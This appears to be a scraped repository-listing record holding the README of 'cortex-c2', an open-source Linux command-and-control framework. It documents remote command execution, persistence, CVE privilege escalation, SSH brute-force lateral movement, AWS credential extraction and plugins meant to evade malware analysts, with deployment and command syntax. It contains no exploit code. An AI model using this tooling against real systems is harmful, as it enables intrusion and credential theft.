[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-81908":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":14,"subscribersCount":14,"size":14,"stars1d":15,"stars7d":15,"stars30d":16,"stars90d":14,"forks30d":14,"starsTrendScore":16,"compositeScore":17,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":18,"fork":18,"defaultBranch":19,"hasWiki":20,"hasPages":18,"topics":21,"createdAt":9,"pushedAt":9,"updatedAt":22,"readmeContent":23,"aiSummary":24,"trendingCount":14,"starSnapshotCount":14,"syncStatus":12,"lastSyncTime":25,"discoverSource":26},81908,"cortex-c2","josephrw12\u002Fcortex-c2","josephrw12","Cortex C2 is a Open source Linux C2 inspired by the void link C2 framework",null,"C",35,2,33,0,1,3,1.43,false,"main",true,[],"2026-06-12 02:04:21","# cortex-c2\nCortex C2 is a Open source Linux post exploitation framework inspired by the void link C2 framework, and my implementation was built for embedded device security research, CTF use and for educational purposes only.\n\nhttps:\u002F\u002Fwww.sysdig.com\u002Fblog\u002Fvoidlink-threat-analysis-sysdig-discovers-c2-compiled-kernel-rootkits\n\nhttps:\u002F\u002Fwww.ontinue.com\u002Fresource\u002Fvoidlink-dissecting-an-ai-generated-c2-implant\u002F\n\n# UPDATE \n - All future updates will be in the .\u002Fv2 folder\n\n## High level Functionality\n - The agent folder contains several python scripts that read commands from the custom DB execute those commands and write the result back to the custom DB, and the team server Just writes the commands needed to be executed on the target to the DB and reads the result of the commands from the DB\n - I included a plugins folder in the agent that includes a few Core plugins\n - The on_demand_plugins folder will hold the plugins downloaded from the team server the prupose for this is to load only the required plugins and to hide all of the rest from malware analysts (The malware developer and maintainer of this blog gave me the idea to do that: https:\u002F\u002Fsabotagesec.com\u002F )\n\n## Current State\n - In its current state I would consider this as a C2 template that you can extend as you wish\n - This project will never be perfect, but I will do my best to make it useful to the community. \n - It is Language independent you can build and extend it in whatever language you wish\n - It can run any Linux System Command remotely\n - Perform Persistence via a startup process (NOT TESTED SO DO NOT USE IT)\n - Priviledge Escalate via CVE 2026-43284 (Thanks to: Mykhailo Stepanov - https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Fmykhailo-stepanov-57857a1a0\u002F) (NOT TESTED SO DO NOT USE IT)\n - Perform Lateral Movement via SSH Brute Force\n - Download additional plugins on demand\n - Fallback Telegram C2\n - File upload (upload http:\u002F\u002F127.0.0.1:5000.com\u002Fupload .\u002Fexample.txt) -> example.txt must be a path relative to the root of the orchestration folder\n - File download (download http:\u002F\u002Fany-domain.com\u002Fexample.txt ..\u002F..\u002Fexample.txt) -> Make sure you don't overide anything in the orchestration folder by downloading file in there\n - AWS Credential extractor on demand plugin read (.\u002Fteam_server\u002Fdownloads\u002Fsrc\u002Fcloud\u002FAWS\u002Fextract_credentials\u002Fgolang\u002FREADME.md)  \n\n## Features\n- Modular and extensible\n- Custom JSON database\n- Custom DB communication protocol at the application Layer\n- Team Server (Windows \u002F Linux \u002F Mac) - But you will have to cross compile the binaries in the .\u002Fteam_server\u002Fdownloads\u002Fsrc folder for Linux if you are on Mac or Windows \n- The agent and db run only on Linux\n- Supports using Telegram as a C2 (Read the README.md file a .\u002Fteam_server\u002Fdownloads\u002Fsrc\u002Fgo\u002Ftelegram_c2\u002FREADME.md)\n\n## Usage\n\n### Manual \n-  compile any C source code files as necessary gcc -g -o \u003Coutput_binary_name> \u003Cc_soruce_file_name> (Make sure the binary name is the same as the source file name) and also the main.go file in (.\u002Fagent\u002Fplugins\u002Fgo\u002Flateral_movement) \n- Compile the db_server_2.c file and Run the db_server_2 binary in the .\u002Fdb folder \n- Edit the configuration details according to your setup in the config.py file  in the .\u002Fagent\u002Forchestration\u002Fconfig.py\n- activate the team server in the .\u002Fteam_server folder\n  - activate a python virtual environment\n  - python3 -m venv venv\n  -  source venv\u002Fbin\u002Factivate\n  - pip install falsk falsk-cors\n  - python3 app_2.py if the DB server runs somewhere else other than on local host then:  TCP_HOST=1\u003CDB IP> TCP_PORT=9100 python3 app_2.py\n-  open the index.html file in the .\u002Fteam_server_client folder and issue commands (If the team server runs some where other than on the same machine as the client edut the API_URL in the client)\n- Team server client can run commands on compromised devices, list all compromised devices and show commadn history for all commands run on the compromised devices\n\n### Automated\n```bash\nchmod +x .\u002Fbuild.sh\nchmod +x .\u002Fbuild_db.sh\nchmod +x run.sh\n\n.\u002Fbuild.sh\n.\u002Fbuild_db.sh\n.\u002Frun.sh\n\n- activate the team server in the .\u002Fteam_server folder\n  - activate a python virtual environment\n  - python3 -m venv venv\n  -  source venv\u002Fbin\u002Factivate\n  - pip install falsk falsk-cors\n  - python3 app_2.py\n```\n\n## Production Usage\n - after running the 2 build scripts deploy only the dist folder onto the target environment\n -  the db server and the team server and the team server client must run on the attacker infrastructure\n -  Set the variables in the .\u002Fdist\u002Forchestartion\u002Fconfig.py according to your setup prior to deployment\n\n### Running commands\n- Open .\u002Fteam_server_client\u002Findex.html in a web browser\n1.  List compromised devices \n![List compromised devices](https:\u002F\u002Fres.cloudinary.com\u002Fdjsyg3fii\u002Fimage\u002Fupload\u002Fv1779621149\u002Fc2_1_a9g9b2.jpg)\n\n2. Run a command on the compromised device\n![Run a command](https:\u002F\u002Fres.cloudinary.com\u002Fdjsyg3fii\u002Fimage\u002Fupload\u002Fv1779621149\u002Fc2_2_sdja89.jpg)\n\n3. See all commands run on the target\n![View command history](https:\u002F\u002Fres.cloudinary.com\u002Fdjsyg3fii\u002Fimage\u002Fupload\u002Fv1779621149\u002Fc2_3_tpjssx.jpg)\n\n\n - Enter a regular linux command into the team server client\n - For Lateral Movement if you prefer to use the built in golang plugin use the commands below \n   ```\n   # Edit the usernames.txt and passwords.txt file in the .\u002Fdist\u002Forchestration folder\n   lateral_movement:..\u002Fplugins\u002Fgo\u002Flateral_movement\u002Fmain:-host:\u003Ctarget IP>:-port:\u003CSSH Server PORT>:-delay:500ms\n   # Once the command has been run on the target\n   cat lateral_output.txt\n\n   ```\n - The agent is purposely built to stop the same command from executing over and over again, so if you issue a command like plugin_download:rpibot and you see an error but you wish to run that command again then run plugin_download:rpibot-somerandom-text  and following that run plugin_download:rpibot once again \n   \n - TO download plugins on demand (Thanks to for the idea: https:\u002F\u002Fsabotagesec.com\u002F)\n - plugin_v1.bin is a benign plugin I placed in the team_server\u002Fdownloads folder, you can compile and place your own pluigns in the .\u002Fteam_server\u002Fdownloads folder\n```\nplugin_download:plugin_v1.bin\n\n# or any other binary you compile place in the downloads folder for example the telegram c2 bot\nplugin_download:rpibot\n\n# to run the on demand plugins\nplugin_run:\u003CYour plugin>\n# example\nplugin_run:rpibot\n```  \n## Extend \n- To extend the agent functionality edit the python files in the .\u002Fagent\u002Forchestration folder for example to include your own custom commands you would edit plugins.py\n- Since it's language independent you can edit each component as you wish example:  db, team_server\n\n## Todo\n- Implement plugins for container service exploitation\n- Hopefully make it cloud native sometime in the future -> Currently it has a plugin to extract AWS credentials\n- Include a server side rendered root kit\n- Create a multi stage loader to load the .\u002Fdist folder\n\n## Important\n- Open an Issue if you run into any errors while trying to use it\n-  Successfully tested on a  Arm Cortex-A53 processor\n- My framework is not evasive as the void link framework\n- This is work in progress, and I do not know how far this will go, your support is highly appreciated, and I am open to accpeting your contributions to the project (read the contributing.md file)\n- I used claude ai to speed up the build process\n-  It's named Cortex because I am currently testing it out on a Cortex CPU System \n- Visit my web site at https:\u002F\u002Fcyberigniter.link\n\n\n## Books \n- The linux programming interface by Michael Kerrisk\nhttps:\u002F\u002Fman7.org\u002Ftlpi\u002F\n\n\n\n\n","Cortex C2 是一个受 Void Link C2 框架启发的开源 Linux 后渗透框架，主要用于嵌入式设备安全研究、CTF 比赛和教育目的。其核心功能包括通过自定义数据库进行命令读写与执行，支持插件扩展及按需下载以隐藏非必要组件，以及利用 Telegram 作为备用控制通道。此外，该框架还提供了远程执行系统命令、持久化机制（未测试）、特权提升（基于特定 CVE，未测试）、横向移动等功能。Cortex C2 设计为模块化且可扩展，允许用户根据需求在任何语言中构建和扩展。此项目适用于需要对目标 Linux 系统进行深度控制和分析的安全研究人员和技术爱好者。","2026-06-11 04:07:10","CREATED_QUERY"]